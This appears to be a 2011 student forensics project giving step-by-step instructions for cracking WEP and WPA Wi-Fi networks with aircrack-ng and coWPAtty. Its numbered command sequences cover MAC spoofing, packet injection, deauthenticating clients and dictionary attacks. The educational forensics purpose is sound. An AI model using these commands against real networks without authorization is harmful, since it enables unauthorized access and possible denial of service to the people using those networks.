Team_Epsilon_Final_Video_Project

advertisement
Team Epsilon
Final Video Team Project
April 13, 2011
Team Members: Ian Levy, Anthony Kuny, Jennifer Strawn, Jordan Godfrey, Mary Viloria
Emails: Ian.t.levy@gmail.com, anthonykuny@gmail.com, jls5538@psu.edu, jgg5047@psu.edu,
makavi963@gmail.com
Table of Content
I . Introduction………………………………………………………………………………3
II . Written Instructions……………………………………………………………………..4
A . Cracking WEP…………………………………………………………………..4
B . Cracking WPA…………………………………………………………………..6
C . CoWPAtty……………………………………………………………………….7
III . Step-by-step Instructions……………………………………………………………….8
A . Cracking WEP…………………………………………………………………..8
B . Cracking WPA…………………………………………………………………..9
C . Cracking WPA with CoWPAtty…………………………………………………9
III . References………………………………………………………………………………10
2
I . Introduction
Wireless cracking is part of penetration testing that gains access to wireless
networks. Criminals usually gain access without authorization or through social engineering. For
computer and cyber forensics this applies to criminals using password cracking and possibly
altering important files. We will set up a scenario where a criminal has a WEP/WPA/2 network
in range and is attempting to gain unauthorized access to the network. We will do this by using
backtrack 4r2 which is an operating system designed for penetration testers that can easily be
installed to run on an USB. Pre-installed in backtrack is a program suite called aircrack-ng that
is used for password cracking using packet injection, dictionary and brute force attacks. Through
this we will show detailed steps on how weak encryption standards can easily be cracked. Also,
we will show how strong encryption standards can easily be cracked with weak passwords. For
cracking WEP we will use packet injection to increase the initialization vectors between the host
and router. Doing this we will be able to obtain the wireless key in hex form which can be
entered in instead of the actual text password to gain access. For WPA/2 we will obtain a
handshake from the router that can be used by offline password cracking programs to attempt to
either brute force attack or a dictionary attack to find the password. This method will require the
actual text of the password. There are plenty of offline password cracker programs available to
use, but we as a group will focus on using aircrack-ng suite and coWPAtty.
This fits into cyber forensics because wireless cracking can be done by criminals trying to
gain access to networks they are trying to gain information from. In cyber forensics, our job is to
retrace steps and gain information and data to show how these types of criminals gained access
to these networks and try to establish the reasoning behind these actions. We will use cyber
forensics to collect preserve and present this data as you would in a law abiding type of setting.
The reason this is important in this perspective is to first demonstrate how the cracking is
accomplished but overall this is useful to any person who intends to investigate network security.
Not only should the steps be known on how to successfully gain access to wireless networks, we
also believe it is useful to learn how to keep computer information private and secure. The first
step is to make sure there is a firewall installed and working correctly by putting in place auto
updates that way the computer is always current. Next, it is important to ensure the settings of
the firewall are in place based on the usage on the computer. Lastly, is it imperative to have
strong substantial passwords to ensure the network as well as the individual computer is
3
protected at the best of the user’s capabilities. To test these revisions in the network, the first step
it to look for leaks by running a leak test using a free online version for example the Gibson
Research Corporation’s LeakTest. Understanding these steps and the ways to prevent wireless
encryption cracking is just as important because it ensures protection to any computer and is
essential in keeping privacy and confidentiality.
II . Written Instructions
In cyber forensics understanding how to break into networks is extremely important. It is
essential for the analyst because it will allow them to interpret the router logs and see that there
was an increase of packets possibly indicating that there was an attack to either perform a denial
of service or to increase initialization vectors to crack WEP encryption. This video
documentation will help explain why this is important and walk through each command and
purpose throughout cracking WEP and WPA encryption.
A. Cracking WEP
First, in order to crack WEP, wired equivalent privacy, we need to do some housekeeping.
We will boot into Backtrack which is a linux based operating system and then we need to launch
the konsole which opens up the command line in backtrack. We will use the aircrack-ng suite to
break into a WEP encrypted network. Within the konsole we will find out which devices are
available to us.
In order to do this we will use the command airmon-ng. As you can see we have a couple
devices, wlan0 and wlan1, we will use wlan0. Now the next task is to put the wireless card in
monitor mode and spoof the mac address to make it easier for latter commands. In order to
change the mac address we first need to put the interface down. We will do this by using the
ifconfig wlan0 down command. ifconfig is the command, wlan0 is the interface and down s the
command option to put the interface down. Then we will change the mac address by using the
command macchanger -- mac 00:11:22:33:44:55 wlan0. macchanger is the command, mac is
the command option and the mac address is the new desired mac address and wlan0 is the
interface to make the desired changes to.
Now we will put the card in monitor mode by using the airmon-ng start wlan0 command.
airmon-ng is the command, wlan0 is the interface and start is the command option to start the
interface. As you can see the airmon command in aircrack-ng create another interface that reads
4
mon0. This is because of the drivers used to make this specific wireless card compatible with the
aircrack-ng suite that is already preinstalled when backtrack is booted up. Now we will scan for
any vulnerable WEP encrypted networks. We are able to do this by using the airodump-ng mon0
command. airodump-ng is the command and we are telling it to use mon0 which is the new
interface we created to scan all the channels to see if any networks are in range. As you can see
all the networks in range are appearing as the wireless card scans all the channels. To stop the
scan you will want to hit Ctrl+C. Now that we have found a vulnerable network we are going to
sniff and capture the traffic at the access point. We will do this by using airodump-ng –c
(channel) –w (file name) –bssid (bssid) (interface). C is for the channel that the vulnerable
network is broadcasting on. The w option is for what name you want to give the .cap file for
cracking later and the bssid is the mac address of the vulnerable network. mon0 is the interface
we are using to sniff the packets. Now we are able to see if there are any connected clients to the
vulnerable network and also able to collect data being sent between the connected clients.
Next is to fake associated our interface with the access point of the vulnerable network. First
we will open up another tab within the konsole window. We will then send the fake associated
packets using the aireplay-ng command. We will us the command aireplay-ng -1 0 –a (bssid) –h
(our interface that we changed to) 00:11:22:33:44:55 mon0 (which is our interface, (our mac
address<<just say that instead of all the numbers) As you can see we were successful with the
konsole message state Association successful :-) (smiley face) Now with that nice little
confirmation message we are able to perform packet injection against the vulnerable network.
We could wait and not make our presence known to any connected clients but we don’t have
time to wait. With packet injection it could potentially perform a denial of service because we
are sending so many packets to increase the data we are trying to capture. This usually only take
a few minutes tops and shouldn’t be too disruptive. Now, for the actual command to make all
this happen. We will us the aireplay-ng command again, aireplay-ng -3 (which is the command
option to send fake packets) –b (the mac address of the vulnerable access point) –h (our
interface) 00:11:22:33:44:55 mon0 (our interface). With this command we are creating network
traffic to speed up the crack. When we switch back to our previous tab where we are sniffing the
network we are able to see the data column increase rapidly.
Now that we are confirming that packets are being injected we will open up another window
to crack the vulnerable network. In our newly opened tab we will start our cracking by using the
5
aircrack-ng command. Entering into the command line aircrack-ng - b(mac address of the
vulnerable access point) filename-01.cap (which is the file name we created with the –w option)
As you can see aircrack-ng is bruteforcing to find the network key for the vulnerable. When the
command successfully find the network key the command will return a command stating KEY
FOUND with the key in hexadecimal form. You will be able to connect to the vulnerable
network by dropping the colons and entering it into the network key.
B . Cracking WPA
WPA stands for WiFi Protected Access. We will perform similar commands as we did
when we cracked WEP but instead of aircrack-ng brute forcing by itself we need to test the
password with a dictionary attack. A dictionary attack is where a text file is compiled of all the
possible network keys that you think will crack the password. Also, in some cases a dictionary
attack may only have words that are in the dictionary but that is to be considered a weak word
lists. We will use the aircrack-ng suite to break into a WPA encrypted network. Within the
konsole we will find out which devices are available to us. In order to do this we will use the
command airmon-ng. As you can see we have a couple devices, wlan0 and wlan1, we will use
wlan0. Now the next task is to put the wireless card in monitor mode and spoof the mac address
to make it easier for latter commands. In order to change the mac address we first need to put the
interface down. We will do this by using the ifconfig wlan0 down command. ifconfig is the
command, wlan0 is the interface and down s the command option to put the interface down.
Then we will change the mac address by using the command macchanger -- mac
00:11:22:33:44:55 wlan0. macchanger is the command, mac is the command option and the mac
address is the new desired mac address and wlan0 is the interface to make the desired changes
to.
Now we will put the card in monitor mode by using the airmon-ng start wlan0 command.
airmon-ng is the command, wlan0 is the interface and start is the command option to start the
interface. As you can see the airmon command in aircrack-ng create another interface that reads
mon0. This is because of the drivers used to make this specific wireless card compatible with the
aircrack-ng suite that is already preinstalled when backtrack is booted up. Now we will scan for
any WPA encrypted networks. We are able to do this by using the airodump-ng mon0 command.
airodump-ng is the command and we are telling it to use mon0 which is the new interface we
created to scan all the channels to see if any networks are in range. As you can see all the
networks in range are appearing as the wireless card scans all the channels. To stop the scan you
6
will want to hit Ctrl+C. Now that we have found a WPA network we are going to sniff and
capture the traffic at the access point. We will do this by using airodump-ng –c (channel) –w (file
name) –bssid (bssid) (interface). C is for the channel that the vulnerable network is broadcasting
on. The w option is for what name you want to give the .cap file for cracking later and the bssid
is the mac address of the vulnerable network. mon0 is the interface we are using to sniff the
packets. Now we are able to see if there are any connected clients to the network and also able to
collect data being sent between the connected clients. Next we to have some connecting clients
to force re-authentication so we can capture the handshake. Once we have captured the hand
shake we can then perform the crack off line. We will open up a text editor and copy down the
connected mac address and use it for our next command. Now we open up another tab and use
the command aireplay-ng -0 1 -a (mac address of the access point) –c(mac address of the
connected client). -0 option is the deauth command and the next number is how packets to send.
Once you have successfully entered in the command, we will switch back to our first tap
and you will notice in the top right hand corner that we have successfully captured the four way
handshake. Now we will stop sniffing the network by hitting Crtl + C. Then we will use the
aircrack-ng command to try and run through a wordlist to crack the password. We will enter
aircrack-ng –w (file location of the wordlist) –b (mac address of the access point we are
attempting to gain access to) and then the file location of the captured four way
handshake. Then aircrack-ng will run through the wordlist and try to crack the wpa password.
As you can see we are successful and the password is password.
C . CoWPAtty
Now we are going to use Cowpatty, an alternative method to WPA cracking. We are
going to type cowpatty then dash r is the capture handshake containing the fourway handshake,
dash f is the file location of the word list you want to use for cracking the password. Now, dash s
is the SSID of the network you are trying to access, at the end, press enter. Cowpatty will run
through the word list and try to find the password, as you can see, it successfully found the word
"password".
7
III . Step-by-step Instructions
A . Cracking WEP
*Hit enter after every step except for 6 and 8
Step 1: Type airmon-ng
Step 2: Type ifconfig wlan0 down
Step 3: Type macchanger -- mac 00:11:22:33:44:55 wlan0.
Step 4: Type airmon-ng start wlan0
Step 5: Type airodump-ng mon0
Step 6: To stop the scan you will want to hit Ctrl+C.
Step 7: Type airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface).
Step 8: Open another tab with the console
Step 9: Type aireplay-ng -1 0 –a (bssid) –h 00:11:22:33:44:55 mon0
Step 10: Once you see this screen, you have successfully associated with the access point.
Step 11: Type aireplay-ng -3 –b (the mac address of the vulnerable access point) –h
00:11:22:33:44:55 mon0.
Step 12: Type aircrack-ng - b(mac address of the vulnerable access point) filename-01.cap
(which is the file name we created with the –w option) When the command successfully
find the network key the command will return a command stating KEY FOUND with the
key in hexadecimal form.
Step 13: You will be able to connect to the vulnerable network by dropping the colons and
entering it into the network key.
8
B . Cracking WPA
*Hit enter after every step except for 6 and 8
Step 1: Type airmon-ng
Step 2: Type ifconfig wlan0 down command.
Step 3: Type macchanger -- mac 00:11:22:33:44:55 wlan0.
Step 4: Type airmon-ng start wlan0
Step 5: Type airodump-ng mon0
Step 6: To stop the scan you will want to hit Ctrl+C.
Step 7: Type airodump-ng –c (channel) –w (file name) –bssid (bssid) (interface).
Step 8: Open another tab with the console
Step 9: aireplay-ng -0 1 -a (mac address of the access point) –c(mac address of the
connected client). -0 option is the deauth command and the next number is how packets to
send.
Step 10: aircrack-ng –w (file location of the wordlist) –b (mac address of the access point
we are attempting to gain access to) and then the file location of the captured four way
handshake.
Step 11: If password is in the defined word list, Aircracking will return the password. If not,
it will say “Password not in dictionary” and you will need to try another list.
C . Cracking WPA with CoWPAtty
Note: This is used after you have capture the four way handshake
Step 1: Enter in cowpatty –r (captured four way handshake) –f (file location of the word
list) –s (network SSID)
Step 2: CoWPAtty will return the password if it is in the dictionary provided, if not, it state
that the password was not in the dictionary file and to try expanding your list.
9
III . References
IT Security Editors. “10 Steps To Securing Firewalls.” 22 January 2007. Web. 4 April 2011.
<http://www.itsecurity.com/features/more-secure-firewall-012207/>
"SpeedGuide.net :: How To Crack WEP and WPA Wireless Networks." SpeedGuide.net :: The
Broadband Guide. Web. 28 Feb. 2011. <http://www.speedguide.net/articles/how-tocrack-wep-and-wpa-wireless-networks-2724>.
Tews, Erik, Ralf-Philipp Weinmann, and Andrei Pyshkin. "Breaking 104 Bit WEP in Less than
60 Seconds." Web. <http://eprint.iacr.org/2007/120.pdf>
10
Download